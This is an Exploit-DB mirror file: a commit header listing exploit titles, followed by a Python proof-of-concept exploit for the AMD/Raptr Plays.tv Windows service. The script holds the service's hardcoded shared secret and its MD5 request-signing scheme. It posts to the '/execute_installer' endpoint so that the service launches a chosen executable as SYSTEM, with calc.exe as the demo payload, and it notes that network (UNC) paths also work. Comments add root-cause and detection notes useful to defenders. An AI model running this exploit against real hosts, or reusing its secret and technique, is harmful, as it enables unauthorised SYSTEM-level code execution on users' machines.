exploit-db-mirror/exploits/windows/local/44476.py
Offensive Security d0cba5625f DB: 2018-04-18
12 changes to exploits/shellcodes

Brave Browser < 0.13.0 -  'long alert() argument' Denial of Service
Brave Browser < 0.13.0 -  'window.close(self)' Denial of Service
AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution
Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)
Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)
D-Link DIR-615 Wireless Router - Persistent Cross Site Scripting
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)

Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
Drupal  < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)

Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

Joomla! Component jDownloads 3.2.58 - Cross Site Scripting
2018-04-18 05:01:47 +00:00


########################################################################
# http://support.amd.com/en-us/download?cmpid=CCCOffline -
# Click "Automatically Detect - Download Now"
# Installation Automatically Installs "Raptr, Inc Plays TV Service"
#
# OR
#
# https://plays.tv/download
#
# Target OS: Windows( Any )
# Privilege: SYSTEM
# Type: Arbitrary File Execution
#
# Notes: Second minor bug allows for arbitrary file write of
# uncontrolled data using the /extract_files path.
#
########################################################################
#!/usr/bin/python3
import urllib.request
import json
import hashlib
def check_svc(path, data):
    """Fingerprint the listener at the module-level ``addr``.

    A POST carrying the literal bytes ``b"data"`` (no ``hash`` field) is
    sent to ``addr``. ``path`` and ``data`` are accepted but never read;
    the URL comes entirely from the global ``addr``.

    Returns:
        "[-] Not Raptr, Plays TV service" when the request completes
        without an HTTP error; "[+] Raptr, Plays TV service" when the
        HTTP error body equals the service's missing-hash message;
        ``None`` for any other HTTP error body.

    Defender note: the exact error string below is a stable signature,
    so the same check can be used to inventory hosts that still run the
    service. Connection-level failures (urllib.error.URLError) are not
    caught here and propagate to the caller.
    """
    # Body text the service returns when no hash accompanies the request.
    missing_hash_reply = 'Security failed - Missing hash or message[data]'
    probe = urllib.request.Request(addr)
    try:
        urllib.request.urlopen(probe, "data".encode("utf-8"))
    except urllib.error.HTTPError as err:
        reply = err.read().decode("utf-8")
        if reply == missing_hash_reply:
            return "[+] Raptr, Plays TV service"
        # Any other error body: no verdict (implicit None in the original).
        return None
    # The request was accepted without a hash, so this is something else.
    return "[-] Not Raptr, Plays TV service"
def post_req(path, data):
    """POST ``data`` to the module-level ``addr`` with the service's hash.

    The request check reproduced here is MD5(path + JSON body + secret),
    sent as the form fields ``data`` and ``hash``. The secret is a fixed
    constant in this script, so the hash only shows that the sender knows
    a value that does not vary per user or per session.
    NOTE(review): presumably the same constant ships in every install of
    the service; confirm against the binary.

    Root cause for defenders: a constant shared secret is not caller
    authentication. A service that launches processes on request should
    identify the caller through the operating system and restrict which
    executables it will start.

    Args:
        path: URL path of the endpoint; used only as hash input, the
            request itself goes to the global ``addr``.
        data: JSON-serialisable object sent as the ``data`` field.

    Returns:
        The raw response body as bytes.
    """
    secret_key = 'a%qs0t33QgiE6ut^0I&Y'
    request = urllib.request.Request(addr)
    json_data = json.dumps(data)
    # Digest over path, body and constant, in that order, as the service expects.
    signed_blob = (path + json_data + secret_key).encode('utf8')
    hash_str = hashlib.md5(signed_blob).hexdigest()
    form_fields = {'data': json_data, 'hash': hash_str}
    p_data = urllib.parse.urlencode(form_fields).encode("utf-8")
    return urllib.request.urlopen(request, p_data).read()
# Host running the service; the PoC uses loopback, i.e. the local machine.
ip = '127.0.0.1'

##############################################################
# The service binds to an ephemeral port recorded at
# [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\PlaysTV\Service]
# The value below is the one observed by the author; it will
# differ per host. Defenders can read the same key to learn
# which local port to firewall or monitor.
##############################################################
port = 50452

##############################################################
# The service calls CreateProcess with the following format:
# '"%s" -appdata "%s" -auto_installed 1' % (installer, appdata)
# so the "installer" value is run as given, with the privilege
# stated in the file header (SYSTEM).
#
# The author notes that a UNC (SMB share) path is accepted as
# well. For detection, watch plays_service.exe for child
# processes that are not its own installer, in particular
# images loaded from network paths.
##############################################################
cmd = "C:\\Windows\\System32\\calc.exe"  # harmless local demo binary
data = dict(installer=cmd, appdata=cmd)

# Endpoint that triggers the CreateProcess call.
path = '/execute_installer'
addr = 'http://{}:{}{}'.format(ip, port, path)

# Optional fingerprint step, left disabled by the author. The arguments
# are in the opposite order to check_svc's signature; check_svc ignores
# both, so this has no effect.
#ret = check_svc(data, path)
#print(ret)

# Send the signed request and show the service's raw reply.
ret = post_req(path, data)
print(ret)